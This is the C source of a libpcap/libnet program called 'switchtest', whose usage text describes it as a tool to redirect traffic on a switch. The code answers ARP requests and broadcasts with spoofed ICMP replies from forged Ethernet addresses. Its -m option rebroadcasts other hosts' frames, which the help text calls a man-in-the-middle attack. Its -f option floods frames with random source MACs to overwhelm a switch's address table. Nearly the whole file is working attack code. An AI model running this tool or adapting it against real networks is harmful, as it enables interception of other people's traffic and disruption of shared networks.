/*
 * strictly speaking, all we can ever expect are stdio.h and sys/types.h
 * so we check for everything else
 */
#include <stdio.h>
#include <sys/types.h>

#if HAVE_CONFIG_H
#  include "config.h"
#endif

#if STDC_HEADERS
#  include <stdlib.h>
#  include <string.h>
#elif HAVE_STRINGS_H
#  include <strings.h>
#endif /* STDC_HEADERS */

#if HAVE_UNISTD_H
#  include <unistd.h>
#endif

#ifndef __OpenBSD__
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#endif

#include <pcap.h>
#include <libnet.h>

#include "switchtest.h"

/* Globals */
int                    DoIP = TRUE;
int                    DoARP = TRUE;
int                    DoMITM = FALSE;
int                    DoFlood = FALSE;
int                    Pcap_media_type;
int                    Pcap_media_offset;
char                  *Interface = NULL;
u_char                 MAC_Addr[6];
u_char                 Ether_broadcast[6] = "\xff\xff\xff\xff\xff\xff";
u_char                 Ether_multicast[6] = "\x03\x00\x00\x20\x00\x00";
u_char                 Ether_win2k[6]     = "\x00\xa0\xcc\x3c\x02\x0e";
u_int32_t              Src_ip;
u_int32_t              Dst_ip;

void
print_usage(char *name)
{
  printf("Usage %s [OPTIONS]\n", name);
  printf("Redirect traffic on a dumb switch\n");
  printf("  -i\t\tSpecify interface name\n");
  printf("  -r\t\tRead from a pcap file (testing only)\n");
  printf("  -A\t\tWatch for ARP requests (Default)\n");
  printf("  -a\t\tDon't watch for ARP requests\n");
  printf("  -B\t\tWatch for IP broadcasts (Default)\n");
  printf("  -b\t\tDon't watch for IP broadcasts\n");
  printf("  -m\t\tTry a man in the middle attack\n");
  printf("  -f\t\tFlood packets with random ethernet source\n");
  printf("  -s\t\tspecify source ip address for spoofed packets\n");
  printf("  -d\t\tspecify destination ip address for spoofed packets\n");
  printf("\n");
}

char *
ip_ntoa(unsigned long ip)
{
  unsigned char *b;
  static char buf[16];

  b = (char *)&ip;
  snprintf(buf, sizeof(buf), "%d.%d.%d.%d", b[0], b[1], b[2], b[3]);

  return(buf);
}

struct ether_addr *
get_ether_addr()
{
  u_char                      *libnet_device = NULL;
  struct libnet_link_int      *libnet_iface = NULL;
  char                         libnet_errbuf[LIBNET_ERRBUF_SIZE];
  static struct ether_addr    *e_addr;
  struct sockaddr_in           sin;

  /* if no interface is specified, figure it out */
  if(Interface){
    libnet_device = (u_char *)Interface;
  } else {
    if(libnet_select_device(&sin, &libnet_device, libnet_errbuf) == -1){
      libnet_error(LIBNET_ERR_FATAL, "libnet_select_device failed: %s\n");
    }
  }

  /* open the interface */
  if(!(libnet_iface=libnet_open_link_interface(libnet_device, libnet_errbuf))){
    libnet_error(LIBNET_ERR_FATAL, "libnet_open_link_interface failed: %s\n");
  }

  /* get our ethernet address */
  e_addr = libnet_get_hwaddr(libnet_iface, libnet_device,  libnet_errbuf);
  if(!e_addr){
    libnet_error(LIBNET_ERR_FATAL, "libnet_get_hwaddr failed: %s\n");
  }

  /* close interface */
  if(libnet_close_link_interface(libnet_iface) == -1){
    libnet_error(LN_ERR_WARNING, "libnet_close_link_interface couldn't close");
  }

  return(e_addr);
}

void
send_icmp_reply(u_int32_t sip, u_int32_t dip, struct ether_addr *e_src)
{
  int                      icmp_packet_size;
  int                      bytes_sent;
  u_char                  *icmp_packet = NULL;
  u_char                  *libnet_device = NULL;
  struct libnet_link_int  *libnet_iface = NULL;
  char                     libnet_errbuf[LIBNET_ERRBUF_SIZE];
  struct sockaddr_in       sin;
  int                      random1, random2;
  u_char                   icmp_payload[] = 
             "\x68\x8b\x2f\x3b\xf5\x30\x0e\x00\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"
             "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
             "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
             "\x30\x31\x32\x33\x34\x35\x36\x37";
  u_char                  *icmp_payload_p;
  int                      icmp_payload_size;
  u_char                  *e_char;

  /* seed random number generator and get some values for later */
  libnet_seed_prand(); 
  random1 = libnet_get_prand(LIBNET_PRu16);
  random2 = libnet_get_prand(LIBNET_PRu16);

  /* set up payload */
  icmp_payload_p = icmp_payload;
  icmp_payload_size = sizeof(icmp_payload) - 1;

  /* if no interface is specified, figure it out */
  if(Interface){
    libnet_device = (u_char *)Interface;
  } else {
    if(libnet_select_device(&sin, &libnet_device, libnet_errbuf) == -1){
      libnet_error(LIBNET_ERR_FATAL, "libnet_select_device failed: %s\n");
    }
  }

  /* open the interface */
  if(!(libnet_iface=libnet_open_link_interface(libnet_device, libnet_errbuf))){
    libnet_error(LIBNET_ERR_FATAL, "libnet_open_link_interface failed: %s\n");
  }

  /* allocate some memory for the packet */
  icmp_packet_size = LIBNET_IP_H + LIBNET_ETH_H + LIBNET_ICMP_ECHO_H + icmp_payload_size;
  if(libnet_init_packet(icmp_packet_size, &icmp_packet) == -1){
    libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed: %s\n");
  }

  /* build the ethernet header */
  libnet_build_ethernet((u_char *)MAC_Addr, (u_char *)e_src, 
                        ETHERTYPE_IP, NULL, 0, icmp_packet);

  /* then the IP header */
  libnet_build_ip(ICMP_ECHO_H + icmp_payload_size,
                  0,             /* ip TOS */
                  random1,       /* ip ID */
                  0,             /* fragmented? */
                  255,           /* ttl */
                  IPPROTO_ICMP,  /* protocol */
                  sip,           /* ip source */
                  dip,           /* ip destination */
                  NULL,          /* pointer to payload */
                  0,             /* payload length */
                  icmp_packet + LIBNET_ETH_H); 

  /* now the ICMP header */
  libnet_build_icmp_echo(ICMP_ECHOREPLY,         /* type */
                         0,                      /* code */
                         random2,                /* id */
                         0,                      /* seq */
                         icmp_payload_p,         /* pointer to payload */
                         icmp_payload_size,      /* payload size */
                         icmp_packet + LIBNET_ETH_H + LIBNET_IP_H);

  /* do checksums */
  if(libnet_do_checksum(icmp_packet + ETH_H, IPPROTO_ICMP, 
                        LIBNET_ICMP_ECHO_H + icmp_payload_size) == -1){
    libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
  }
  if(libnet_do_checksum(icmp_packet + ETH_H, IPPROTO_IP, LIBNET_IP_H) == -1) {
    libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
  }

  /* send the packet */
  bytes_sent = libnet_write_link_layer(libnet_iface, libnet_device, icmp_packet,
                                       icmp_packet_size);
  if(bytes_sent < icmp_packet_size){
    libnet_error(LN_ERR_WARNING, "libnet_write_link_layer send incomplete\n");
  } else {
    e_char = (unsigned char *)e_src;
    printf("sent (from %02x:%02x:%02x:%02x:%02x:%02x)\n", 
            e_char[0], e_char[1], e_char[2], e_char[3], e_char[4], e_char[5]);
  }

  /* close interface */
  if(libnet_close_link_interface(libnet_iface) == -1){
    libnet_error(LN_ERR_WARNING, "libnet_close_link_interface couldn't close");
  }

  /* free packet memory */
  libnet_destroy_packet(&icmp_packet);

}

void
send_icmp_request(u_int32_t sip, u_int32_t dip, struct ether_addr *e_src,
                  struct ether_addr *e_dst)
{
  int                      icmp_packet_size;
  int                      bytes_sent;
  u_char                  *icmp_packet = NULL;
  u_char                  *libnet_device = NULL;
  struct libnet_link_int  *libnet_iface = NULL;
  char                     libnet_errbuf[LIBNET_ERRBUF_SIZE];
  struct sockaddr_in       sin;
  int                      random1, random2;
  u_char                   icmp_payload[] = 
             "\x68\x8b\x2f\x3b\xf5\x30\x0e\x00\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"
             "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
             "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
             "\x30\x31\x32\x33\x34\x35\x36\x37";
  u_char                  *icmp_payload_p;
  int                      icmp_payload_size;
  u_char                  *e_char;

  /* seed random number generator and get some values for later */
  libnet_seed_prand(); 
  random1 = libnet_get_prand(LIBNET_PRu16);
  random2 = libnet_get_prand(LIBNET_PRu16);

  /* set up payload */
  icmp_payload_p = icmp_payload;
  icmp_payload_size = sizeof(icmp_payload) - 1;

  /* if no interface is specified, figure it out */
  if(Interface){
    libnet_device = (u_char *)Interface;
  } else {
    if(libnet_select_device(&sin, &libnet_device, libnet_errbuf) == -1){
      libnet_error(LIBNET_ERR_FATAL, "libnet_select_device failed: %s\n");
    }
  }

  /* open the interface */
  if(!(libnet_iface=libnet_open_link_interface(libnet_device, libnet_errbuf))){
    libnet_error(LIBNET_ERR_FATAL, "libnet_open_link_interface failed: %s\n");
  }

  /* allocate some memory for the packet */
  icmp_packet_size = LIBNET_IP_H + LIBNET_ETH_H + LIBNET_ICMP_ECHO_H + icmp_payload_size;
  if(libnet_init_packet(icmp_packet_size, &icmp_packet) == -1){
    libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed: %s\n");
  }

  /* build the ethernet header */
  libnet_build_ethernet((u_char *)e_dst, (u_char *)e_src, 
                        ETHERTYPE_IP, NULL, 0, icmp_packet);

  /* then the IP header */
  libnet_build_ip(ICMP_ECHO_H + icmp_payload_size,
                  0,             /* ip TOS */
                  random1,       /* ip ID */
                  0,             /* fragmented? */
                  255,           /* ttl */
                  IPPROTO_ICMP,  /* protocol */
                  sip,           /* ip source */
                  dip,           /* ip destination */
                  NULL,          /* pointer to payload */
                  0,             /* payload length */
                  icmp_packet + LIBNET_ETH_H); 

  /* now the ICMP header */
  libnet_build_icmp_echo(ICMP_ECHO,              /* type */
                         0,                      /* code */
                         random2,                /* id */
                         0,                      /* seq */
                         icmp_payload_p,         /* pointer to payload */
                         icmp_payload_size,      /* payload size */
                         icmp_packet + LIBNET_ETH_H + LIBNET_IP_H);

  /* do checksums */
  if(libnet_do_checksum(icmp_packet + ETH_H, IPPROTO_ICMP, 
                        LIBNET_ICMP_ECHO_H + icmp_payload_size) == -1){
    libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
  }
  if(libnet_do_checksum(icmp_packet + ETH_H, IPPROTO_IP, LIBNET_IP_H) == -1) {
    libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
  }

  /* send the packet */
  bytes_sent = libnet_write_link_layer(libnet_iface, libnet_device, icmp_packet,
                                       icmp_packet_size);
  if(bytes_sent < icmp_packet_size){
    libnet_error(LN_ERR_WARNING, "libnet_write_link_layer send incomplete\n");
  } else {
    e_char = (unsigned char *)e_src;
    printf("sent (from %02x:%02x:%02x:%02x:%02x:%02x)\n", 
            e_char[0], e_char[1], e_char[2], e_char[3], e_char[4], e_char[5]);
  }

  /* close interface */
  if(libnet_close_link_interface(libnet_iface) == -1){
    libnet_error(LN_ERR_WARNING, "libnet_close_link_interface couldn't close");
  }

  /* free packet memory */
  libnet_destroy_packet(&icmp_packet);

}

void
send_packet(u_char *packet, int packet_len)
{
  int                      bytes_sent;
  u_char                  *libnet_device = NULL;
  struct libnet_link_int  *libnet_iface = NULL;
  char                     libnet_errbuf[LIBNET_ERRBUF_SIZE];
  struct sockaddr_in       sin;

  /* if no interface is specified, figure it out */
  if(Interface){
    libnet_device = (u_char *)Interface;
  } else {
    if(libnet_select_device(&sin, &libnet_device, libnet_errbuf) == -1){
      libnet_error(LIBNET_ERR_FATAL, "libnet_select_device failed: %s\n");
    }
  }

  /* open the interface */
  if(!(libnet_iface=libnet_open_link_interface(libnet_device, libnet_errbuf))){
    libnet_error(LIBNET_ERR_FATAL, "libnet_open_link_interface failed: %s\n");
  }

  /* send the packet */
  bytes_sent = libnet_write_link_layer(libnet_iface, libnet_device, packet,
                                       packet_len);
  if(bytes_sent < packet_len){
    libnet_error(LN_ERR_WARNING, "libnet_write_link_layer send incomplete\n");
  } else {
    printf("bounced\n");
  }

  /* close interface */
  if(libnet_close_link_interface(libnet_iface) == -1){
    libnet_error(LN_ERR_WARNING, "libnet_close_link_interface couldn't close");
  }
}

void
send_tcp_syn(u_int32_t sip, u_int32_t dip, struct ether_addr *e_src,
                  struct ether_addr *e_dst)
{
  int                      tcp_packet_size;
  int                      bytes_sent;
  u_char                  *tcp_packet = NULL;
  u_char                  *libnet_device = NULL;
  struct libnet_link_int  *libnet_iface = NULL;
  char                     libnet_errbuf[LIBNET_ERRBUF_SIZE];
  struct sockaddr_in       sin;
  int                      random1, random2;
  u_char                  *e_char;

  /* seed random number generator and get some values for later */
  libnet_seed_prand(); 
  random1 = libnet_get_prand(LIBNET_PRu16);
  random2 = libnet_get_prand(LIBNET_PRu16);

  /* if no interface is specified, figure it out */
  if(Interface){
    libnet_device = (u_char *)Interface;
  } else {
    if(libnet_select_device(&sin, &libnet_device, libnet_errbuf) == -1){
      libnet_error(LIBNET_ERR_FATAL, "libnet_select_device failed: %s\n");
    }
  }

  /* open the interface */
  if(!(libnet_iface=libnet_open_link_interface(libnet_device, libnet_errbuf))){
    libnet_error(LIBNET_ERR_FATAL, "libnet_open_link_interface failed: %s\n");
  }

  /* allocate some memory for the packet */
  tcp_packet_size = LIBNET_TCP_H + LIBNET_IP_H + LIBNET_ETH_H;
  if(libnet_init_packet(tcp_packet_size, &tcp_packet) == -1){
    libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed: %s\n");
  }

  /* build the ethernet header */
  libnet_build_ethernet((u_char *)e_dst, (u_char *)e_src, 
                        ETHERTYPE_IP, NULL, 0, tcp_packet);

  /* then the IP header */
  libnet_build_ip(LIBNET_TCP_H,
                  0,             /* ip TOS */
                  random1,       /* ip ID */
                  0,             /* fragmented? */
                  255,           /* ttl */
                  IPPROTO_TCP,   /* protocol */
                  sip,           /* ip source */
                  dip,           /* ip destination */
                  NULL,          /* pointer to payload */
                  0,             /* payload length */
                  tcp_packet + LIBNET_ETH_H); 

  /* then the TCP header */
  libnet_build_tcp(random2,             /* source TCP port */ 
            80,                         /* destination TCP port */ 
            random2,                    /* sequence number */ 
            0x53,                       /* acknowledgement number */ 
            TH_SYN,                     /* control flags */ 
            1024,                       /* window size */ 
            0,                          /* urgent pointer */ 
            NULL,                       /* payload (none) */ 
            0,                          /* payload length */ 
            tcp_packet + LIBNET_IP_H + LIBNET_ETH_H);  /* packet header memory */ 

  /* do checksums */
  /* TCP checksum */
  if(libnet_do_checksum(tcp_packet + ETH_H, IPPROTO_TCP, LIBNET_TCP_H) == -1){
    libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
  }
  /* IP checksum */
  if(libnet_do_checksum(tcp_packet + ETH_H, IPPROTO_IP, LIBNET_IP_H) == -1) {
    libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
  }

  /* send the packet */
  bytes_sent = libnet_write_link_layer(libnet_iface, libnet_device, tcp_packet,
                                       tcp_packet_size);
  if(bytes_sent < tcp_packet_size){
    libnet_error(LN_ERR_WARNING, "libnet_write_link_layer send incomplete\n");
  } else {
    e_char = (unsigned char *)e_src;
    printf("sent (from %02x:%02x:%02x:%02x:%02x:%02x)\n", 
            e_char[0], e_char[1], e_char[2], e_char[3], e_char[4], e_char[5]);
  }

  /* close interface */
  if(libnet_close_link_interface(libnet_iface) == -1){
    libnet_error(LN_ERR_WARNING, "libnet_close_link_interface couldn't close");
  }

  /* free packet memory */
  libnet_destroy_packet(&tcp_packet);

}

void
process_arp(u_char *data)
{
  struct ether_addr *e_src;
  int                x;

  /* ARP packet looks like this:
   * length  - description                   offset
   * 6 bytes - Ethernet destination address    0- 5
   * 6 bytes - Ethernet source address         6-11
   * 2 bytes - Ethernet frame type            12-13
   * 2 bytes - Hardware address type          14-15
   * 2 bytes - Protocol type                  16-17
   * 1 byte  - Hardware address size             18
   * 1 byte  - Protocol address size             19
   * 2 bytes - Operation type                 20-21
   * 6 bytes - sender ethernet address        22-27
   * 4 bytes - sender ip address              28-31
   * 6 bytes - target ethernet address        32-37
   * 4 bytes - target ip address              38-41
   */

  /* check that it's destined for broadcast */
  if(!memcmp(data, Ether_broadcast, 6)){
    /* check that it is a request for an IP address */
    if(data[16] == 0x08 && data[17] == 0x00){
      /* check it's an ARP request */
      if(data[20] == 0x00 && data[21] == 0x01){
        printf("a");
        e_src = (struct ether_addr *)&data[6];
        /* send a bunch of packets */
        for(x=0;x<5;x++){
          send_icmp_reply(Src_ip, Dst_ip, e_src);
        }
      }
    }
  }
}

void
process_ip(u_char *data)
{
  struct ip         *IPH;
  struct udphdr     *UDPH;
  int                udplen;
  u_char            *udpdata;
  u_char            *dip;
  struct ether_addr *e_src;

  IPH     = (struct ip *)(data+Pcap_media_offset);

  /* check it's a broadcast packet */
  dip = (u_char *)&data[Pcap_media_offset+16];
  if(dip[0] == 0xff){
    printf("b");
    e_src = (struct ether_addr *)&data[6];
    send_icmp_reply(Src_ip, Dst_ip, e_src);
  }
}

void
do_it(u_char *par, struct pcap_pkthdr *hdr, u_char *data)
{
  static int      packet_count = 0;
  u_char         *new_packet = NULL;

  packet_count++;
  printf(".");

  if(hdr->caplen < Pcap_media_offset){
    printf("[x] short frame recieved (<%d\n)", Pcap_media_offset);
    return;
  }

  if(hdr->caplen != hdr->len){
    printf("[x] hdr->caplen != hdr->len(%d!=%d)\n", hdr->caplen, hdr->len);
    return;
  }


  if(DoARP){
    /* is this an arp frame? */
    if((data[12] == 0x08) && (data[13] == 0x06)){
      printf("A");
      process_arp(data);
    }
  }

  if(DoIP){
    /* is this an IP frame */
    if((data[12] == 0x08) && (data[13] == 0x00)){
      printf("I");
      if(hdr->caplen < (20+Pcap_media_offset)){ /* too short to be valid */
        printf("[x] short frame recieved (<%d\n)", Pcap_media_offset+20);
        return;
      }
      process_ip(data);
    }
  }

  if(DoMITM){
    /* rebroadcast the packet */
    /* Only rebroadcast if it's not actually to us, */
    /* or from us, or already a broadcast packet */
    if(!(!memcmp(data, MAC_Addr, 6) || !memcmp(&data[6], MAC_Addr, 6) ||
         !memcmp(data, Ether_broadcast, 6))){
      /* make a copy of the packet */
      new_packet = (u_char *)calloc(1, hdr->caplen);
      if(!new_packet){
        printf("Out of memory in do_it\n");
        exit(EXIT_FAILURE);
      }
      memcpy(new_packet, data, hdr->caplen);
      /* reset the destination address */
      new_packet[ 0] = 0xff;
      new_packet[ 1] = 0xff;
      new_packet[ 2] = 0xff;
      new_packet[ 3] = 0xff;
      new_packet[ 4] = 0xff;
      new_packet[ 5] = 0xff;
      /* and the source address */
      new_packet[ 6] = MAC_Addr[0];
      new_packet[ 7] = MAC_Addr[1];
      new_packet[ 8] = MAC_Addr[2];
      new_packet[ 9] = MAC_Addr[3];
      new_packet[10] = MAC_Addr[4];
      new_packet[11] = MAC_Addr[5];
      /* send the packet */
      printf("\nAbout to bounce\nOriginal packet:\n"
             "%02x:%02x:%02x:%02x:%02x:%02x <- "
             "%02x:%02x:%02x:%02x:%02x:%02x\n", 
             data[0], data[1], data[2], data[3], data[4], data[5], 
             data[6], data[7], data[8], data[9], data[10], data[11]);
      printf("new packet:\n%02x:%02x:%02x:%02x:%02x:%02x <- "
             "%02x:%02x:%02x:%02x:%02x:%02x\n", 
             new_packet[0], new_packet[1], new_packet[2], new_packet[3],
             new_packet[4], new_packet[5], new_packet[6], new_packet[7], 
             new_packet[8], new_packet[9], new_packet[10], new_packet[11]);
      send_packet(new_packet, hdr->caplen);
      /* free the packet */
      free(new_packet);
      new_packet = NULL;
    }
  }

  printf("\n");
}

int
main(int argc, char *argv[])
{
  int               arg;
  /* libpcap stuff */
  pcap_t            *PD = NULL;
  extern char        pcap_version[];
  char               pcap_errbuf[PCAP_ERRBUF_SIZE];
  char              *pcap_file = NULL;
  u_char             e_src[6];
  u_char            *e_char;
  u_char            *e_char_g = "\x00\xa0\xcc\x3b\xee\x04"; // gateway
  struct ether_addr *e_addr_s;
  struct ether_addr *e_addr_d;
  char              *sip_addr = "207.46.197.100"; /* random microsoft.com */
  char              *dip_addr = "207.46.230.218"; /* addresses */
  int                x;

  printf("[*] Switchtest starting ... \n");

  /* get command line parameters */
  while((arg = getopt(argc, argv, "s:d:mAaIifr:i:h?")) != EOF){
    switch(arg){
      case 'f': DoFlood = TRUE;
                break;
      case 'm': DoMITM = TRUE;
                break;
      case 'a': DoARP = FALSE;
                break;
      case 'A': DoARP = TRUE;
                break;
      case 'b': DoIP = FALSE;
                break;
      case 'B': DoIP = TRUE;
                break;
      case 'i': Interface = optarg;
                break;
      case 'r': pcap_file = optarg;
                break;
      case 's': sip_addr = optarg;
                break;
      case 'd': dip_addr = optarg;
                break;
      case 'h':
      case '?': print_usage(argv[0]);
                exit(EXIT_SUCCESS);
                break;
    }
  }

  /* set up our source and dest ip addrs */
  Src_ip = inet_addr(sip_addr);
  Dst_ip = inet_addr(dip_addr);

  if(DoFlood){
    srand(31337);
    while(TRUE){
      usleep(50);
      printf(".");
      e_src[0] = rand() % 256;
      e_src[1] = rand() % 256;
      e_src[2] = rand() % 256;
      e_src[3] = rand() % 256;
      e_src[4] = rand() % 256;
      e_src[5] = rand() % 256;
      send_icmp_reply(Src_ip, Dst_ip, (struct ether_addr *)e_src);
    }
  } else {
    /* Initialize packet capture */
    if(!Interface){
      Interface = pcap_lookupdev(pcap_errbuf);
      if(!Interface){
        printf("[x] PCAP Error: %s\n", pcap_errbuf);
        exit(EXIT_FAILURE);
      }
    }

    printf("[*] Opening %s\n", Interface);

    if(pcap_file){
      PD = pcap_open_offline(pcap_file, pcap_errbuf);
    } else {
      PD = pcap_open_live(Interface, ETHERSNAPLEN, PROMISC, 1000, pcap_errbuf);
    }
    if(!PD){
      printf("[x] PCAP open error: %s\n", pcap_errbuf);
      exit(EXIT_FAILURE);
    }

    switch((Pcap_media_type = pcap_datalink(PD))){
      case DLT_EN10MB: Pcap_media_offset = 14;
                       printf("[*] Ethernet detected\n");
                       break;
      default:         printf("[x] Unsupported link type\n");
                       exit(EXIT_FAILURE);
                       break;
    }

    /* get our ethernet address */
    e_addr_s = get_ether_addr();
    e_char = (u_char *) e_addr_s;
    MAC_Addr[0] = e_char[0];
    MAC_Addr[1] = e_char[1];
    MAC_Addr[2] = e_char[2];
    MAC_Addr[3] = e_char[3];
    MAC_Addr[4] = e_char[4];
    MAC_Addr[5] = e_char[5];
    printf("[*] Ethernet address is %02x:%02x:%02x:%02x:%02x:%02x\n",
           MAC_Addr[0], MAC_Addr[1], MAC_Addr[2],
           MAC_Addr[3], MAC_Addr[4], MAC_Addr[5]);

    /* test sending icmp echo request to ether broadcast */
    e_addr_s = (struct ether_addr *)Ether_win2k;
    e_addr_d = (struct ether_addr *)Ether_win2k;
    //e_addr_d = (struct ether_addr *)Ether_broadcast;
    send_icmp_request(Src_ip, Dst_ip, e_addr_s, e_addr_d);
    //e_addr_d = (struct ether_addr *)e_char_g;
    //send_icmp_request(Src_ip, Dst_ip, e_addr_s, e_addr_d);

    /* test sending tcp syn to ether broadcast */
    //e_addr_s = (struct ether_addr *)MAC_Addr;
    //e_addr_d = (struct ether_addr *)Ether_multicast;
    //e_addr_d = (struct ether_addr *)Ether_broadcast;
    //send_tcp_syn(Src_ip, Dst_ip, e_addr_s, e_addr_d);
    //e_addr_d = (struct ether_addr *)e_char_g;
    //send_tcp_syn(Src_ip, Dst_ip, e_addr_s, e_addr_d);


    /* set up signal handler */
    /* XXX - do this */

    while(TRUE){
      pcap_dispatch(PD, 1000, (pcap_handler) do_it, 0);
    }
  }

  return(0);
}

